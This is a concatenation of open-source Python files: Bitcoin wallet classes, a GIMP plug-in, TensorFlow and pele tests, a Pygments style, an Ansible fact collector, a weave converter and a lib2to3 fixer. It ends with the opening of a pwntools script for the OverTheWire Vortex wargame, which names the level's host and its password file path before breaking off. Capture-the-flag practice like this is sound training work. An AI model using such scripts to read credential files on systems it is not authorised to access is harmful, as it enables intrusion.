class BIP32_HD_Wallet(BIP32_Wallet):
# wallet that can create accounts
def __init__(self, storage):
self.next_account = storage.get('next_account', None)
BIP32_Wallet.__init__(self, storage)
def can_create_accounts(self):
return self.root_name in self.master_private_keys.keys()
def addresses(self, b=True):
l = BIP32_Wallet.addresses(self, b)
if self.next_account:
next_address = self.next_account[2]
if next_address not in l:
l.append(next_address)
return l
def get_address_index(self, address):
if self.next_account:
next_id, next_xpub, next_address = self.next_account
if address == next_address:
return next_id, (0,0)
return BIP32_Wallet.get_address_index(self, address)
def num_accounts(self):
keys = []
for k, v in self.accounts.items():
if type(v) != BIP32_Account:
continue
keys.append(k)
i = 0
while True:
account_id = '%d'%i
if account_id not in keys:
break
i += 1
return i
def get_next_account(self, password):
account_id = '%d'%self.num_accounts()
derivation = self.root_name + "%d'"%int(account_id)
xpub, xprv = self.derive_xkeys(self.root_name, derivation, password)
self.add_master_public_key(derivation, xpub)
if xprv:
self.add_master_private_key(derivation, xprv, password)
account = BIP32_Account({'xpub':xpub})
addr = account.first_address()
self.add_address(addr)
return account_id, xpub, addr
def create_main_account(self, password):
# First check the password is valid (this raises if it isn't).
self.check_password(password)
assert self.num_accounts() == 0
self.create_account('Main account', password)
def create_account(self, name, password):
account_id, xpub, addr = self.get_next_account(password)
account = BIP32_Account({'xpub':xpub})
self.add_account(account_id, account)
self.set_label(account_id, name)
# add address of the next account
self.next_account = self.get_next_account(password)
self.storage.put('next_account', self.next_account)
def account_is_pending(self, k):
return type(self.accounts.get(k)) == PendingAccount
def delete_pending_account(self, k):
assert type(self.accounts.get(k)) == PendingAccount
self.accounts.pop(k)
self.save_accounts()
def create_pending_account(self, name, password):
next_id, next_xpub, next_address = self.next_account if self.next_account else self.get_next_account_address(password)
self.set_label(next_id, name)
self.accounts[next_id] = PendingAccount({'pending':next_address})
self.save_accounts()
def synchronize(self):
# synchronize existing accounts
BIP32_Wallet.synchronize(self)
if self.next_account is None:
try:
self.next_account = self.get_next_account(None)
self.storage.put('next_account', self.next_account)
except:
pass
# check pending account
if self.next_account is not None:
next_id, next_xpub, next_address = self.next_account
if self.address_is_old(next_address):
print_error("creating account", next_id)
self.add_account(next_id, BIP32_Account({'xpub':next_xpub}))
# here the user should get a notification
self.next_account = None
self.storage.put('next_account', self.next_account)
elif self.history.get(next_address, []):
if next_id not in self.accounts:
print_error("create pending account", next_id)
self.accounts[next_id] = PendingAccount({'pending':next_address})
self.save_accounts()
class NewWallet(BIP32_HD_Wallet, Mnemonic):
# bip 44
root_name = 'x/'
root_derivation = "m/44'/0'"
wallet_type = 'standard'
class Wallet_2of2(BIP32_Wallet, Mnemonic):
# Wallet with multisig addresses.
# Cannot create accounts
root_name = "x1/"
root_derivation = "m/44'/0'"
wallet_type = '2of2'
def can_import(self):
return False
def create_main_account(self, password):
xpub1 = self.master_public_keys.get("x1/")
xpub2 = self.master_public_keys.get("x2/")
account = BIP32_Account_2of2({'xpub':xpub1, 'xpub2':xpub2})
self.add_account('0', account)
def get_master_public_keys(self):
xpub1 = self.master_public_keys.get("x1/")
xpub2 = self.master_public_keys.get("x2/")
return {'x1':xpub1, 'x2':xpub2}
def get_action(self):
xpub1 = self.master_public_keys.get("x1/")
xpub2 = self.master_public_keys.get("x2/")
if xpub1 is None:
return 'create_seed'
if xpub2 is None:
return 'add_cosigner'
if not self.accounts:
return 'create_accounts'
class Wallet_2of3(Wallet_2of2):
# multisig 2 of 3
wallet_type = '2of3'
def create_main_account(self, password):
xpub1 = self.master_public_keys.get("x1/")
xpub2 = self.master_public_keys.get("x2/")
xpub3 = self.master_public_keys.get("x3/")
account = BIP32_Account_2of3({'xpub':xpub1, 'xpub2':xpub2, 'xpub3':xpub3})
self.add_account('0', account)
def get_master_public_keys(self):
xpub1 = self.master_public_keys.get("x1/")
xpub2 = self.master_public_keys.get("x2/")
xpub3 = self.master_public_keys.get("x3/")
return {'x1':xpub1, 'x2':xpub2, 'x3':xpub3}
def get_action(self):
xpub1 = self.master_public_keys.get("x1/")
xpub2 = self.master_public_keys.get("x2/")
xpub3 = self.master_public_keys.get("x3/")
if xpub1 is None:
return 'create_seed'
if xpub2 is None or xpub3 is None:
return 'add_two_cosigners'
if not self.accounts:
return 'create_accounts'
class OldWallet(Deterministic_Wallet):
wallet_type = 'old'
gap_limit = 5
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 5)
def make_seed(self):
import old_mnemonic
seed = random_seed(128)
return ' '.join(old_mnemonic.mn_encode(seed))
def format_seed(self, seed):
import old_mnemonic
# see if seed was entered as hex
seed = seed.strip()
try:
assert seed
seed.decode('hex')
return OLD_SEED_VERSION, str(seed)
except Exception:
pass
words = seed.split()
seed = old_mnemonic.mn_decode(words)
if not seed:
raise Exception("Invalid seed")
return OLD_SEED_VERSION, seed
def create_master_keys(self, password):
seed = self.get_seed(password)
mpk = OldAccount.mpk_from_seed(seed)
self.storage.put('master_public_key', mpk, True)
def get_master_public_key(self):
return self.storage.get("master_public_key")
def get_master_public_keys(self):
return {'Main Account':self.get_master_public_key()}
def create_main_account(self, password):
mpk = self.storage.get("master_public_key")
self.create_account(mpk)
def create_account(self, mpk):
self.accounts['0'] = OldAccount({'mpk':mpk, 0:[], 1:[]})
self.save_accounts()
def create_watching_only_wallet(self, mpk):
self.seed_version = OLD_SEED_VERSION
self.storage.put('seed_version', self.seed_version, True)
self.storage.put('master_public_key', mpk, True)
self.create_account(mpk)
def get_seed(self, password):
seed = pw_decode(self.seed, password).encode('utf8')
return seed
def check_password(self, password):
seed = self.get_seed(password)
self.accounts['0'].check_seed(seed)
def get_mnemonic(self, password):
import old_mnemonic
s = self.get_seed(password)
return ' '.join(old_mnemonic.mn_encode(s))
def can_sign(self, tx):
if self.is_watching_only():
return False
if tx.is_complete():
return False
addr_list, xpub_list = tx.inputs_to_sign()
for addr in addr_list:
if self.is_mine(addr):
return True
for xpub, sequence in xpub_list:
if xpub == self.get_master_public_key():
return True
return False
wallet_types = [
# category type description constructor
('standard', 'old', ("Old wallet"), OldWallet),
('standard', 'xpub', ("BIP32 Import"), BIP32_Simple_Wallet),
('standard', 'standard', ("Standard wallet"), NewWallet),
('standard', 'imported', ("Imported wallet"), Imported_Wallet),
('multisig', '2of2', ("Multisig wallet (2 of 2)"), Wallet_2of2),
('multisig', '2of3', ("Multisig wallet (2 of 3)"), Wallet_2of3)
]
# former WalletFactory
class Wallet(object):
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
seed_version = storage.get('seed_version')
if not seed_version:
seed_version = OLD_SEED_VERSION if len(storage.get('master_public_key','')) == 128 else NEW_SEED_VERSION
if seed_version not in [OLD_SEED_VERSION, NEW_SEED_VERSION]:
msg = "This wallet seed is not supported anymore."
if seed_version in [5, 7, 8, 9]:
msg += "\nTo open this wallet, try 'git checkout seed_v%d'"%seed_version
print msg
sys.exit(1)
run_hook('add_wallet_types', wallet_types)
wallet_type = storage.get('wallet_type')
if wallet_type:
for cat, t, name, c in wallet_types:
if t == wallet_type:
WalletClass = c
break
else:
raise BaseException('unknown wallet type', wallet_type)
else:
if seed_version == OLD_SEED_VERSION:
WalletClass = OldWallet
else:
WalletClass = NewWallet
return WalletClass(storage)
@classmethod
def is_seed(self, seed):
if not seed:
return False
elif is_old_seed(seed):
return True
elif is_new_seed(seed):
return True
else:
return False
@classmethod
def is_old_mpk(self, mpk):
try:
int(mpk, 16)
assert len(mpk) == 128
return True
except:
return False
@classmethod
def is_xpub(self, text):
try:
assert text[0:4] == 'xpub'
deserialize_xkey(text)
return True
except:
return False
@classmethod
def is_xprv(self, text):
try:
assert text[0:4] == 'xprv'
deserialize_xkey(text)
return True
except:
return False
@classmethod
def is_address(self, text):
if not text:
return False
for x in text.split():
if not bitcoin.is_address(x):
return False
return True
@classmethod
def is_private_key(self, text):
if not text:
return False
for x in text.split():
if not bitcoin.is_private_key(x):
return False
return True
@classmethod
def from_seed(self, seed, storage):
if is_old_seed(seed):
klass = OldWallet
elif is_new_seed(seed):
klass = NewWallet
w = klass(storage)
return w
@classmethod
def from_address(self, text, storage):
w = Imported_Wallet(storage)
for x in text.split():
w.accounts[IMPORTED_ACCOUNT].add(x, None, None, None)
w.save_accounts()
return w
@classmethod
def from_private_key(self, text, storage):
w = Imported_Wallet(storage)
for x in text.split():
w.import_key(x, None)
return w
@classmethod
def from_old_mpk(self, mpk, storage):
w = OldWallet(storage)
w.seed = ''
w.create_watching_only_wallet(mpk)
return w
@classmethod
def from_xpub(self, xpub, storage):
w = BIP32_Simple_Wallet(storage)
w.create_xpub_wallet(xpub)
return w
@classmethod
def from_xprv(self, xprv, password, storage):
w = BIP32_Simple_Wallet(storage)
w.create_xprv_wallet(xprv, password)
return w
| gpl-3.0 |
Distrotech/gimp | plug-ins/pygimp/plug-ins/sphere.py | 16 | 3492 | #!/usr/bin/env python
# Gimp-Python - allows the writing of Gimp plugins in Python.
# Copyright (C) 1997 James Henstridge <james@daa.com.au>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import math
from gimpfu import *
def sphere(radius, light, shadow, foo, bg_colour, sphere_colour):
if radius < 1:
radius = 1
width = int(radius * 3.75)
height = int(radius * 2.5)
gimp.context_push()
img = gimp.Image(width, height, RGB)
drawable = gimp.Layer(img, "Sphere Layer", width, height,
RGB_IMAGE, 100, NORMAL_MODE)
radians = light * math.pi / 180
cx = width / 2
cy = height / 2
light_x = cx + radius * 0.6 * math.cos(radians)
light_y = cy - radius * 0.6 * math.sin(radians)
light_end_x = cx + radius * math.cos(math.pi + radians)
light_end_y = cy - radius * math.sin(math.pi + radians)
offset = radius * 0.1
img.disable_undo()
img.insert_layer(drawable)
gimp.set_foreground(sphere_colour)
gimp.set_background(bg_colour)
pdb.gimp_edit_fill(drawable, BACKGROUND_FILL)
gimp.set_background(20, 20, 20)
if (light >= 45 and light <= 75 or light <= 135 and
light >= 105) and shadow:
shadow_w = radius * 2.5 * math.cos(math.pi + radians)
shadow_h = radius * 0.5
shadow_x = cx
shadow_y = cy + radius * 0.65
if shadow_w < 0:
shadow_x = cx + shadow_w
shadow_w = -shadow_w
pdb.gimp_ellipse_select(img, shadow_x, shadow_y, shadow_w, shadow_h,
CHANNEL_OP_REPLACE, True, True, 7.5)
pdb.gimp_edit_bucket_fill(drawable, BG_BUCKET_FILL,
MULTIPLY_MODE, 100, 0, False, 0, 0)
pdb.gimp_ellipse_select(img, cx - radius, cy - radius, 2 * radius,
2 * radius, CHANNEL_OP_REPLACE, True, False, 0)
pdb.gimp_edit_blend(drawable, FG_BG_RGB_MODE, NORMAL_MODE, GRADIENT_RADIAL,
100, offset, REPEAT_NONE, False, False, 0, 0, True,
light_x, light_y, light_end_x, light_end_y)
pdb.gimp_selection_none(img)
img.enable_undo()
disp = gimp.Display(img)
gimp.context_pop()
register(
"python-fu-sphere",
"Simple sphere with drop shadow",
"Simple sphere with drop shadow",
"James Henstridge",
"James Henstridge",
"1997-1999, 2007",
"_Sphere",
"",
[
(PF_INT, "radius", "Radius for sphere", 100),
(PF_SLIDER, "light", "Light angle", 45, (0,360,1)),
(PF_TOGGLE, "shadow", "Shadow?", 1),
(PF_RADIO, "foo", "Test", "foo", (("Foo", "foo"), ("Bar", "bar"))),
(PF_COLOR, "bg-color", "Background", (1.0, 1.0, 1.0)),
(PF_COLOR, "sphere-color", "Sphere", "orange")
],
[],
sphere,
menu="<Image>/Filters/Languages/Python-Fu/Test")
main()
| gpl-3.0 |
Bulochkin/tensorflow_pack | tensorflow/contrib/tensor_forest/python/kernel_tests/update_fertile_slots_op_test.py | 80 | 4201 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.contrib.tensor_forest.ops.allocate_deallocate_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow # pylint: disable=unused-import
from tensorflow.contrib.tensor_forest.python.ops import tensor_forest_ops
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
class UpdateFertileSlotsTest(test_util.TensorFlowTestCase):
def setUp(self):
# tree is:
# 0
# 1 2
# 3 4 5 6
self.finished = [2]
self.non_fertile_leaves = [3, 4]
self.non_fertile_leaf_scores = [10., 15.]
self.end_of_tree = [5]
self.node_map = [-1, -1, 0, -1, -1, -1, -1]
self.total_counts = [[80., 40., 40.]]
self.stale_leaves = []
self.node_sums = [[3, 1, 2], [4, 2, 2], [5, 2, 3], [6, 1, 5], [7, 5, 2],
[8, 4, 4], [9, 7, 2]]
def testSimple(self):
with self.test_session():
(n2a_map_updates, a2n_map_updates, accumulators_cleared,
accumulators_allocated) = tensor_forest_ops.update_fertile_slots(
self.finished, self.non_fertile_leaves, self.non_fertile_leaf_scores,
self.end_of_tree, self.total_counts, self.node_map,
self.stale_leaves, self.node_sums)
self.assertAllEqual([[2, 4], [-1, 0]], n2a_map_updates.eval())
self.assertAllEqual([[0], [4]], a2n_map_updates.eval())
self.assertAllEqual([], accumulators_cleared.eval())
self.assertAllEqual([0], accumulators_allocated.eval())
def testNoFinished(self):
with self.test_session():
(n2a_map_updates, a2n_map_updates, accumulators_cleared,
accumulators_allocated) = tensor_forest_ops.update_fertile_slots(
[], self.non_fertile_leaves, self.non_fertile_leaf_scores,
self.end_of_tree, self.total_counts, self.node_map,
self.stale_leaves, self.node_sums)
self.assertAllEqual((2, 0), n2a_map_updates.eval().shape)
self.assertAllEqual((2, 0), a2n_map_updates.eval().shape)
self.assertAllEqual([], accumulators_cleared.eval())
self.assertAllEqual([], accumulators_allocated.eval())
def testPureCounts(self):
with self.test_session():
self.node_sums[4] = [10, 0, 10]
(n2a_map_updates, a2n_map_updates, accumulators_cleared,
accumulators_allocated) = tensor_forest_ops.update_fertile_slots(
self.finished, self.non_fertile_leaves, self.non_fertile_leaf_scores,
self.end_of_tree, self.total_counts, self.node_map,
self.stale_leaves, self.node_sums)
self.assertAllEqual([[2, 3], [-1, 0]], n2a_map_updates.eval())
self.assertAllEqual([[0], [3]], a2n_map_updates.eval())
self.assertAllEqual([], accumulators_cleared.eval())
self.assertAllEqual([0], accumulators_allocated.eval())
def testBadInput(self):
del self.non_fertile_leaf_scores[-1]
with self.test_session():
with self.assertRaisesOpError(
'Number of non fertile leaves should be the same in '
'non_fertile_leaves and non_fertile_leaf_scores.'):
(n2a_map_updates, _, _, _) = tensor_forest_ops.update_fertile_slots(
self.finished, self.non_fertile_leaves,
self.non_fertile_leaf_scores, self.end_of_tree, self.total_counts,
self.node_map, self.stale_leaves, self.node_sums)
self.assertAllEqual((2, 0), n2a_map_updates.eval().shape)
if __name__ == '__main__':
googletest.main()
| apache-2.0 |
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/pygments/styles/paraiso_light.py | 126 | 5645 | # -*- coding: utf-8 -*-
"""
pygments.styles.paraiso_light
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Paraíso (Light) by Jan T. Sott
Pygments template by Jan T. Sott (https://github.com/idleberg)
Created with Base16 Builder by Chris Kempson
(https://github.com/chriskempson/base16-builder).
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, Text, \
Number, Operator, Generic, Whitespace, Punctuation, Other, Literal
BACKGROUND = "#e7e9db"
CURRENT_LINE = "#b9b6b0"
SELECTION = "#a39e9b"
FOREGROUND = "#2f1e2e"
COMMENT = "#8d8687"
RED = "#ef6155"
ORANGE = "#f99b15"
YELLOW = "#fec418"
GREEN = "#48b685"
AQUA = "#5bc4bf"
BLUE = "#06b6ef"
PURPLE = "#815ba4"
class ParaisoLightStyle(Style):
default_style = ''
background_color = BACKGROUND
highlight_color = SELECTION
background_color = BACKGROUND
highlight_color = SELECTION
styles = {
# No corresponding class for the following:
Text: FOREGROUND, # class: ''
Whitespace: "", # class: 'w'
Error: RED, # class: 'err'
Other: "", # class 'x'
Comment: COMMENT, # class: 'c'
Comment.Multiline: "", # class: 'cm'
Comment.Preproc: "", # class: 'cp'
Comment.Single: "", # class: 'c1'
Comment.Special: "", # class: 'cs'
Keyword: PURPLE, # class: 'k'
Keyword.Constant: "", # class: 'kc'
Keyword.Declaration: "", # class: 'kd'
Keyword.Namespace: AQUA, # class: 'kn'
Keyword.Pseudo: "", # class: 'kp'
Keyword.Reserved: "", # class: 'kr'
Keyword.Type: YELLOW, # class: 'kt'
Operator: AQUA, # class: 'o'
Operator.Word: "", # class: 'ow' - like keywords
Punctuation: FOREGROUND, # class: 'p'
Name: FOREGROUND, # class: 'n'
Name.Attribute: BLUE, # class: 'na' - to be revised
Name.Builtin: "", # class: 'nb'
Name.Builtin.Pseudo: "", # class: 'bp'
Name.Class: YELLOW, # class: 'nc' - to be revised
Name.Constant: RED, # class: 'no' - to be revised
Name.Decorator: AQUA, # class: 'nd' - to be revised
Name.Entity: "", # class: 'ni'
Name.Exception: RED, # class: 'ne'
Name.Function: BLUE, # class: 'nf'
Name.Property: "", # class: 'py'
Name.Label: "", # class: 'nl'
Name.Namespace: YELLOW, # class: 'nn' - to be revised
Name.Other: BLUE, # class: 'nx'
Name.Tag: AQUA, # class: 'nt' - like a keyword
Name.Variable: RED, # class: 'nv' - to be revised
Name.Variable.Class: "", # class: 'vc' - to be revised
Name.Variable.Global: "", # class: 'vg' - to be revised
Name.Variable.Instance: "", # class: 'vi' - to be revised
Number: ORANGE, # class: 'm'
Number.Float: "", # class: 'mf'
Number.Hex: "", # class: 'mh'
Number.Integer: "", # class: 'mi'
Number.Integer.Long: "", # class: 'il'
Number.Oct: "", # class: 'mo'
Literal: ORANGE, # class: 'l'
Literal.Date: GREEN, # class: 'ld'
String: GREEN, # class: 's'
String.Backtick: "", # class: 'sb'
String.Char: FOREGROUND, # class: 'sc'
String.Doc: COMMENT, # class: 'sd' - like a comment
String.Double: "", # class: 's2'
String.Escape: ORANGE, # class: 'se'
String.Heredoc: "", # class: 'sh'
String.Interpol: ORANGE, # class: 'si'
String.Other: "", # class: 'sx'
String.Regex: "", # class: 'sr'
String.Single: "", # class: 's1'
String.Symbol: "", # class: 'ss'
Generic: "", # class: 'g'
Generic.Deleted: RED, # class: 'gd',
Generic.Emph: "italic", # class: 'ge'
Generic.Error: "", # class: 'gr'
Generic.Heading: "bold " + FOREGROUND, # class: 'gh'
Generic.Inserted: GREEN, # class: 'gi'
Generic.Output: "", # class: 'go'
Generic.Prompt: "bold " + COMMENT, # class: 'gp'
Generic.Strong: "bold", # class: 'gs'
Generic.Subheading: "bold " + AQUA, # class: 'gu'
Generic.Traceback: "", # class: 'gt'
}
| agpl-3.0 |
khs26/pele | pele/utils/tests/test_hessian_eigs.py | 5 | 4244 | import unittest
import numpy as np
from pele.utils.hessian import *
from pele.utils.hessian import get_smallest_eig_nohess, get_smallest_eig_sparse, get_smallest_eig_arpack
class TestEig(unittest.TestCase):
def setUp(self):
np.random.seed(0)
from pele.systems import LJCluster
natoms = 10
self.system = LJCluster(natoms)
system = self.system
self.pot = system.get_potential()
quencher = system.get_minimizer(tol=2.)
x = system.get_random_configuration()
ret = quencher(x)
self.x = ret[0]
self.xmin = system.get_random_minimized_configuration()[0]
e, g, self.h = self.pot.getEnergyGradientHessian(self.x)
e, g, self.hmin = self.pot.getEnergyGradientHessian(self.xmin)
def numerical_eig_from_vec(self, x, vec, eps=1e-6):
x = x.copy()
x += vec * eps
eplus, gplus = self.pot.getEnergyGradient(x)
x -= 2. * vec * eps
eminus, gminus = self.pot.getEnergyGradient(x)
eval = np.dot((gplus - gminus), vec) / (2. * eps)
return eval
def test_minimum(self):
w = get_eigvals(self.hmin)
wmin = np.min(w)
self.assertGreater(wmin, -1e-5)
def test_eig_eigval(self):
w0 = get_eigvals(self.h)
w, v = get_eig(self.h)
diff = np.max(np.abs(w-w0))
self.assertLess(diff, 1e-5)
def test_numeric(self):
wlist, vlist = get_eig(self.h)
eps = 1e-6
for i in range(len(wlist)):
w = wlist[i]
v = vlist[:,i]
eval = self.numerical_eig_from_vec(self.x, v)
self.assertAlmostEqual(w, eval, 5)
def test_numeric_sorted(self):
wlist, vlist = get_sorted_eig(self.h)
eps = 1e-6
for i in range(len(wlist)):
w = wlist[i]
v = vlist[:,i]
eval = self.numerical_eig_from_vec(self.x, v)
self.assertAlmostEqual(w, eval, 5)
def test_sorting(self):
w, v = get_eig(self.h)
ws, vs = get_sorted_eig(self.h)
wsort = np.array(sorted(w))
diff = np.max(np.abs(ws - wsort))
self.assertLess(diff, 1e-5)
# print "unsorted", v
# print "sorted", vs
isort = sorted([(w[i], i) for i in range(len(w))])
indices = [i for wval, i in isort]
for i, j in enumerate(indices):
self.assertAlmostEqual(ws[i], w[j], 5)
if np.abs(w[j]) > .01:
# print w[j]
v1 = vs[:,i]
v2 = v[:,j]
dot = np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))
self.assertAlmostEqual(dot, 1., 5)
diff = np.max(np.abs(vs[:,i] - v[:,j]))
self.assertLess(diff, 1e-5)
def test_smallest_eig(self):
ws, vs = get_sorted_eig(self.h)
ws = ws[0]
vs = vs[:,0]
w, v = get_smallest_eig(self.h)
self.assertAlmostEqual(ws, w, 6)
dot = np.dot(v, vs) / (np.linalg.norm(v) * np.linalg.norm(vs))
self.assertAlmostEqual(dot, 1., 5)
def test_smallest_eig1(self):
ws, vs = get_smallest_eig(self.h)
w, v = get_smallest_eig_arpack(self.h, tol=1e-9)
self.assertAlmostEqual(ws, w, 3)
dot = np.dot(v, vs) / (np.linalg.norm(v) * np.linalg.norm(vs))
dot = np.abs(dot)
self.assertAlmostEqual(dot, 1., 3)
def test_smallest_eig2(self):
ws, vs = get_smallest_eig(self.h)
w, v = get_smallest_eig_sparse(self.h, cutoff=1e-2, tol=1e-9)
# print vs.shape, v.shape
self.assertAlmostEqual(ws, w, 2)
dot = np.dot(v, vs) / (np.linalg.norm(v) * np.linalg.norm(vs))
dot = np.abs(dot)
self.assertAlmostEqual(dot, 1., 2)
def test_smallest_eig_nohess(self):
ws, vs = get_smallest_eig(self.h)
w, v = get_smallest_eig_nohess(self.x, self.system, tol=1e-9, dx=1e-6)
# print vs.shape, v.shape
self.assertAlmostEqual(ws, w, 1)
dot = np.dot(v, vs) / (np.linalg.norm(v) * np.linalg.norm(vs))
dot = np.abs(dot)
self.assertAlmostEqual(dot, 1., 1)
if __name__ == "__main__":
unittest.main()
| gpl-3.0 |
agaffney/ansible | lib/ansible/module_utils/facts/system/fips.py | 232 | 1338 | # Determine if a system is in 'fips' mode
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils.facts.utils import get_file_content
from ansible.module_utils.facts.collector import BaseFactCollector
class FipsFactCollector(BaseFactCollector):
name = 'fips'
_fact_ids = set()
def collect(self, module=None, collected_facts=None):
# NOTE: this is populated even if it is not set
fips_facts = {}
fips_facts['fips'] = False
data = get_file_content('/proc/sys/crypto/fips_enabled')
if data and data == '1':
fips_facts['fips'] = True
return fips_facts
| gpl-3.0 |
jseabold/scipy | scipy/weave/cpp_namespace_spec.py | 98 | 3837 | """ This converter works with classes protected by a namespace with
SWIG pointers (Python strings). To use it to wrap classes in
a C++ namespace called "ft", use the following:
class ft_converter(cpp_namespace_converter):
namespace = 'ft::'
"""
from __future__ import absolute_import, print_function
from weave import common_info
from weave import base_info
from weave.base_spec import base_converter
cpp_support_template = \
"""
static %(cpp_struct)s* convert_to_%(cpp_clean_struct)s(PyObject* py_obj,char* name)
{
%(cpp_struct)s *cpp_ptr = 0;
char* str = PyString_AsString(py_obj);
if (!str)
handle_conversion_error(py_obj,"%(cpp_struct)s", name);
// work on this error reporting...
//std::cout << "in:" << name << " " py_obj << std::endl;
if (SWIG_GetPtr(str,(void **) &cpp_ptr,"_%(cpp_struct)s_p"))
{
handle_conversion_error(py_obj,"%(cpp_struct)s", name);
}
//std::cout << "out:" << name << " " << str << std::endl;
return cpp_ptr;
}
static %(cpp_struct)s* py_to_%(cpp_clean_struct)s(PyObject* py_obj,char* name)
{
%(cpp_struct)s *cpp_ptr;
char* str = PyString_AsString(py_obj);
if (!str)
handle_conversion_error(py_obj,"%(cpp_struct)s", name);
// work on this error reporting...
if (SWIG_GetPtr(str,(void **) &cpp_ptr,"_%(cpp_struct)s_p"))
{
handle_conversion_error(py_obj,"%(cpp_struct)s", name);
}
return cpp_ptr;
}
std::string %(cpp_clean_struct)s_to_py( %(cpp_struct)s* cpp_ptr)
{
char ptr_string[%(ptr_string_len)s];
SWIG_MakePtr(ptr_string, cpp_ptr, "_%(cpp_struct)s_p");
return std::string(ptr_string);
}
"""
class cpp_namespace_converter(base_converter):
_build_information = [common_info.swig_info()]
def __init__(self,class_name=None):
self.type_name = 'unknown cpp_object'
self.name = 'no name'
if class_name:
# customize support_code for whatever type I was handed.
clean_name = class_name.replace('::','_')
clean_name = clean_name.replace('<','_')
clean_name = clean_name.replace('>','_')
clean_name = clean_name.replace(' ','_')
# should be enough for 64 bit machines
str_len = len(clean_name) + 20
vals = {'cpp_struct': class_name,
'cpp_clean_struct': clean_name,
'ptr_string_len': str_len}
specialized_support = cpp_support_template % vals
custom = base_info.base_info()
custom._support_code = [specialized_support]
self._build_information = self._build_information + [custom]
self.type_name = class_name
def type_match(self,value):
try:
cpp_ident = value.split('_')[2]
if self.namespace in cpp_ident:
return 1
except:
pass
return 0
def type_spec(self,name,value):
# factory
ptr_fields = value.split('_')
class_name = '_'.join(ptr_fields[2:-1])
new_spec = self.__class__(class_name)
new_spec.name = name
return new_spec
def declaration_code(self,inline=0):
type = self.type_name
clean_type = type.replace('::','_')
name = self.name
var_name = self.retrieve_py_variable(inline)
template = '%(type)s *%(name)s = '\
'convert_to_%(clean_type)s(%(var_name)s,"%(name)s");\n'
code = template % locals()
return code
def __repr__(self):
msg = "(%s:: name: %s)" % (self.type_name,self.name)
return msg
def __cmp__(self,other):
#only works for equal
return cmp(self.name,other.name) or \
cmp(self.__class__, other.__class__) or \
cmp(self.type_name,other.type_name)
| bsd-3-clause |
pleaseproject/python-for-android | python3-alpha/python3-src/Lib/lib2to3/fixes/fix_map.py | 170 | 3058 | # Copyright 2007 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Fixer that changes map(F, ...) into list(map(F, ...)) unless there
exists a 'from future_builtins import map' statement in the top-level
namespace.
As a special case, map(None, X) is changed into list(X). (This is
necessary because the semantics are changed in this case -- the new
map(None, X) is equivalent to [(x,) for x in X].)
We avoid the transformation (except for the special case mentioned
above) if the map() call is directly contained in iter(<>), list(<>),
tuple(<>), sorted(<>), ...join(<>), or for V in <>:.
NOTE: This is still not correct if the original code was depending on
map(F, X, Y, ...) to go on until the longest argument is exhausted,
substituting None for missing values -- like zip(), it now stops as
soon as the shortest argument is exhausted.
"""
# Local imports
from ..pgen2 import token
from .. import fixer_base
from ..fixer_util import Name, Call, ListComp, in_special_context
from ..pygram import python_symbols as syms
class FixMap(fixer_base.ConditionalFix):
BM_compatible = True
PATTERN = """
map_none=power<
'map'
trailer< '(' arglist< 'None' ',' arg=any [','] > ')' >
>
|
map_lambda=power<
'map'
trailer<
'('
arglist<
lambdef< 'lambda'
(fp=NAME | vfpdef< '(' fp=NAME ')'> ) ':' xp=any
>
','
it=any
>
')'
>
>
|
power<
'map' trailer< '(' [arglist=any] ')' >
>
"""
skip_on = 'future_builtins.map'
def transform(self, node, results):
if self.should_skip(node):
return
if node.parent.type == syms.simple_stmt:
self.warning(node, "You should use a for loop here")
new = node.clone()
new.prefix = ""
new = Call(Name("list"), [new])
elif "map_lambda" in results:
new = ListComp(results["xp"].clone(),
results["fp"].clone(),
results["it"].clone())
else:
if "map_none" in results:
new = results["arg"].clone()
else:
if "arglist" in results:
args = results["arglist"]
if args.type == syms.arglist and \
args.children[0].type == token.NAME and \
args.children[0].value == "None":
self.warning(node, "cannot convert map(None, ...) "
"with multiple arguments because map() "
"now truncates to the shortest sequence")
return
if in_special_context(node):
return None
new = node.clone()
new.prefix = ""
new = Call(Name("list"), [new])
new.prefix = node.prefix
return new
| apache-2.0 |
HackerTool/pwntools-write-ups | wargames/overthewire-vortex/level1/win.py | 4 | 1093 | #!/usr/bin/env python2
from pwn import *
import time
level = 1
host = 'vortex.labs.overthewire.org'
user = 'vortex%i' % level
chal = 'vortex%i' % level
password = args['PASSWORD']
passfile = '/etc/vortex_pass/vortex%i' % (level+1)
